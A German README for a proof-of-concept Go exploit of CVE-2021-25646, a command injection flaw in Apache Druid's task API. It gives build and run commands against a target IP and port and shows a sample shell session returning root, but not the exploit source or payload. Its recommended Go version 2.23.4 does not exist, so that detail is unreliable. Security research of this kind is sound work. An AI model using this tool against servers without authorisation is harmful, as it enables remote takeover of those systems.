
Ein Proof-of-Concept für die CVE-2021-25646, die eine Command Injection ermöglicht
Dieses Repository enthält einen Proof-of-Concept (PoC) Exploit für CVE-2021-25646, eine kritische Remote-Code-Ausführungssicherheitslücke in Apache Druid.
Der Exploit ist in Go geschrieben und ermöglicht interaktive Befehlseinschleusung über das Terminal.
Sie benötigen eine installierte Go-Version (empfohlen: Version 2.23.4).
go build .
Dies erzeugt eine Binärdatei im aktuellen Verzeichnis.
Sie können den Exploit entweder durch Erstellen der Binärdatei oder direkt mit go run ausführen.
-i : IP-Adresse des Ziel-Druid-Servers (erforderlich)-p : Port des Ziel-Druid-Servers (erforderlich)-proxy : Angabe der Proxy-URL (optional)Ausführen der erstellten Binärdatei:
./cve -i 127.0.0.1 -p 8888
Oder direkt mit Go ausführen:
go run main.go -i 127.0.0.1 -p 8888
$ ./cve -i 127.0.0.1 -p 8888
~ $ whoami
root
~ $ uname -a
Linux druid-server 4.15.0-123-generic #126-Ubuntu SMP ...
Sicherheitslücke:
Der Exploit nutzt eine fehlerhafte Eingabevalidierung in der Druid-indexer-Komponente, insbesondere in der task-API, aus, was eine Befehlseinschleusung über manipulierte JSON-Nutzlasten ermöglicht.
Referenzen:
Diese Software wird ausschließlich zu Bildungszwecken bereitgestellt.
Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch diesen Code verursacht werden.
Holen Sie vor dem Testen eines Systems stets die entsprechende Genehmigung ein.